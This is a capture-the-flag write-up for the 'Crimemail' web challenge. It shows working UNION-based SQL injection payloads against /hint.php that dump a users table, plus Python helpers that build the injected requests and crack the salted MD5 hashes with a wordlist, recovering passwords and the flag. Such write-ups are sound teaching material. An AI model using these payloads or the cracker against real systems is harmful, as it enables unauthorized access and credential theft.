Tags: sqli
Rating:
# ▼▼▼Crimemail - WEB 20 190/549=34.6%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
rvice, to communicate with his associates.
Let's see if you can hack your way in his account...
Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary
```
---
**【Search for vulnerabilities】**
```
POST /hint.php HTTP/1.1
Host: crimemail.ctf.insecurity-insa.fr
Connection: close
Content-Length: 12
Cache-Control: max-age=0
Origin: https://crimemail.ctf.insecurity-insa.fr
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://crimemail.ctf.insecurity-insa.fr/forgot.php
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: scoreboard=e72d247aba1e8bf23b45240642d98732d1505c8e; PHPSESSID=06ig4gvui8hni0urb7p5bo7rg0
username=%27
```
↓
`username='or'1'='1'--+` ⇒Content-Length: 1331
`username='or'1'='0'--+` ⇒Content-Length: 953
↓
**A SQL injection vulnerability exists!!**
---
**【Get table name】**
username= `'UNION/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA=database()+--+`
↓
```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(5) "users"
}
}
```
↓
**A `users` table exists!!**
---
**【Get columns name】**
username= `'UNION/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/TABLE_SCHEMA=database()+--+`
↓
```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(6) "userID"
}
[1]=>
array(1) {
["hint"]=>
string(8) "username"
}
[2]=>
array(1) {
["hint"]=>
string(9) "pass_salt"
}
[3]=>
array(1) {
["hint"]=>
string(8) "pass_md5"
}
[4]=>
array(1) {
["hint"]=>
string(4) "hint"
}
}
```
↓
**Column names are `userID`, `username`, `pass_salt`, `pass_md5`, `hint` !!** (the schema contains only the `users` table, so these are all its columns)
---
**【Get the value of username column】**
username= `'UNION/**/select/**/username/**/from/**/users--+`
↓
```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(9) "p.escobar"
}
[1]=>
array(1) {
["hint"]=>
string(7) "g.dupuy"
}
[2]=>
array(1) {
["hint"]=>
string(8) "a.capone"
}
[3]=>
array(1) {
["hint"]=>
string(8) "c.manson"
}
[4]=>
array(1) {
["hint"]=>
string(8) "c.hackle"
}
}
```
---
**【Dump the whole row of `c.hackle` (userID=5)】**
username= `'UNION/**/select/**/group_concat(userID,":",username,":",pass_salt,":",pass_md5,":",hint)/**/from/**/users/**/where/**/userID=5--+`
↓
```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(76) "5:c.hackle:yhbG:f2b31b3a7a7c41093321d0c98c37f5ad:I don't need any hints man!"
}
}
```
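The extraction above is one payload per row, read back by eye from PHP `var_dump()` output. The helper below is an added example, not part of the original writeup: it builds the `username` body for `/hint.php` in the same `/**/`-and-`--+` form the writeup uses, and parses the `var_dump()` text (sample copied from the `userID=5` row above) into plain strings and fields. It assumes the server-side query is a one-column `SELECT hint FROM users WHERE username='<input>'`, which the page never shows but which the one-column UNION implies.

```python
import re

# Constructed sample: the var_dump() text /hint.php returned for the userID=5
# group_concat payload in the writeup, embedded so the parser runs offline.
SAMPLE_RESPONSE = '''array(1) {
[0]=>
array(1) {
["hint"]=>
string(76) "5:c.hackle:yhbG:f2b31b3a7a7c41093321d0c98c37f5ad:I don't need any hints man!"
}
}
'''

# Column order used in the group_concat payload on the page.
COLUMNS = ["userID", "username", "pass_salt", "pass_md5", "hint"]


def injected_body(select_expr: str) -> str:
    """Return the raw POST body for /hint.php carrying a one-column UNION.

    Assumed (not shown on the page) server-side query:
        SELECT hint FROM users WHERE username='<input>'
    Spaces inside select_expr become /**/ exactly as in the writeup. The
    trailing '+' is decoded to a space by the form parser, so MySQL sees
    '-- ' (a bare '--' without trailing whitespace is NOT a comment).
    """
    return "username='UNION/**/select/**/" + select_expr.replace(" ", "/**/") + "--+"


_STR = re.compile(rb'string\((\d+)\) "')


def parse_hints(var_dump_text: str) -> list[str]:
    """Pull every string value out of a var_dump() of an array of rows.

    var_dump() reports the length in *bytes*, so the text is handled as
    UTF-8 bytes and sliced by length; this is robust against quotes and
    newlines inside the value, unlike a naive "..." regex.
    """
    data = var_dump_text.encode("utf-8")
    values, pos = [], 0
    while True:
        m = _STR.search(data, pos)
        if not m:
            return values
        n = int(m.group(1))
        start = m.end()
        values.append(data[start:start + n].decode("utf-8"))
        pos = start + n + 1  # skip the closing quote


def split_row(row: str, columns: list[str] = COLUMNS) -> dict[str, str]:
    """Split a ':'-joined group_concat row into named fields.

    maxsplit = len(columns)-1 keeps any ':' inside the last column (the
    free-text hint) intact instead of silently producing extra fields.
    """
    parts = row.split(":", len(columns) - 1)
    if len(parts) != len(columns):
        raise ValueError(f"expected {len(columns)} fields, got {len(parts)}: {row!r}")
    return dict(zip(columns, parts))


def dump_row_body(user_id: int) -> str:
    """Body for dumping one full row, identical to the page's userID=5 payload."""
    cols = ',":",'.join(COLUMNS)
    return injected_body(f"group_concat({cols}) from users where userID={user_id}")


if __name__ == "__main__":
    print(dump_row_body(5))
    for row in parse_hints(SAMPLE_RESPONSE):
        print(split_row(row))
```

In practice you would loop `dump_row_body(1..5)` through the same POST as the capture above and feed each response to `parse_hints`; nothing here touches the network.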
---
The remaining rows were dumped the same way, one `userID` at a time; the fifth `pass_salt`/`pass_md5` pair is the `c.hackle` row shown above.
`pass_salt`
↓
`Jdhy`, `Kujh`, `hTjl`, `YbEr`, `yhbG`
---
`pass_md5`
↓
`c4598aadc36b55ba1a4f64f16e2b32f1`, `0fd221fc1358c698ae5db16992703bcd`, `23afc9d3a96e5c338f7ba7da4f8d59f8`, `fe3437f0308c444f0b536841131f5274`, `f2b31b3a7a7c41093321d0c98c37f5ad`
---
**【Identify password】**
`Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary`
↓
The hash (`pass_md5`) and `$salt` (`pass_salt`) are known from the dump
`$password` comes from an English wordlist
↓
Locally, **brute force the wordlist against each hash**: for every candidate word compute md5(word + salt) and compare it with the dumped `pass_md5`
↓
c4598aadc36b55ba1a4f64f16e2b32f1 ⇒ not found in the wordlist
0fd221fc1358c698ae5db16992703bcd ⇒ not found in the wordlist
23afc9d3a96e5c338f7ba7da4f8d59f8 ⇒ `scarface`
fe3437f0308c444f0b536841131f5274 ⇒ `murders`
f2b31b3a7a7c41093321d0c98c37f5ad ⇒ `pizza`
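The offline attack, as an added example rather than the writeup's own script: it tries every word of a wordlist against each dumped salt/hash pair. The hint's `$password + $salt` is read as concatenation (in PHP `+` is numeric addition, `.` concatenates), and because the concatenation order is the usual source of a "nothing cracks" result, the cracker tries both `password+salt` and `salt+password` and reports which one matched. The salt/hash pairs are the page's values paired positionally; only the fifth pair is confirmed as `c.hackle` by the row dump. The tiny wordlist is constructed here so the block runs offline; `load_wordlist` is for a real dictionary file.

```python
import hashlib

# Salt/hash pairs as listed in the dump above (positional pairing; only the
# last one, c.hackle / userID=5, is confirmed by the full-row dump).
DUMPED = [
    ("Jdhy", "c4598aadc36b55ba1a4f64f16e2b32f1"),
    ("Kujh", "0fd221fc1358c698ae5db16992703bcd"),
    ("hTjl", "23afc9d3a96e5c338f7ba7da4f8d59f8"),
    ("YbEr", "fe3437f0308c444f0b536841131f5274"),
    ("yhbG", "f2b31b3a7a7c41093321d0c98c37f5ad"),
]

# Constructed stand-in for an English dictionary; use load_wordlist() for a real one.
WORDLIST = ["password", "letmein", "scarface", "murders", "pizza", "hackle", "dictionary"]

ORDERS = ("password+salt", "salt+password")


def salted_md5(word: str, salt: str, order: str = "password+salt") -> str:
    """md5 of the salted password in the given concatenation order (hex)."""
    data = word + salt if order == "password+salt" else salt + word
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def crack_salted_md5(target_hex: str, salt: str, words, orders=ORDERS):
    """Return (word, order) for the first wordlist entry whose salted md5
    matches target_hex, or None if the wordlist does not contain it."""
    target = target_hex.strip().lower()
    for word in words:
        for order in orders:
            if salted_md5(word, salt, order) == target:
                return word, order
    return None


def crack_all(pairs, words):
    """Crack a list of (salt, hash) pairs; one result (or None) per pair."""
    return [crack_salted_md5(h, salt, words) for salt, h in pairs]


def load_wordlist(path: str):
    """Read one candidate per line; latin-1 tolerates odd bytes in big lists."""
    with open(path, encoding="latin-1") as f:
        return [line.rstrip("\r\n") for line in f if line.strip()]


if __name__ == "__main__":
    for (salt, h), hit in zip(DUMPED, crack_all(DUMPED, WORDLIST)):
        print(f"{h} salt={salt} => {hit or 'not in wordlist'}")
```

Per-user salts only prevent a shared lookup table; with a four-character salt and unsalted-fast MD5, a dictionary attack per row costs one hash per word, so a real wordlist of a few hundred thousand entries finishes in seconds.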
---
Logging in as `c.hackle` with the password `pizza` shows the message:
↓
```
UNKNOWN SENDER says:
Meet me at INSA{s3cr3t_l0cat10n}
```
↓
`INSA{s3cr3t_l0cat10n}`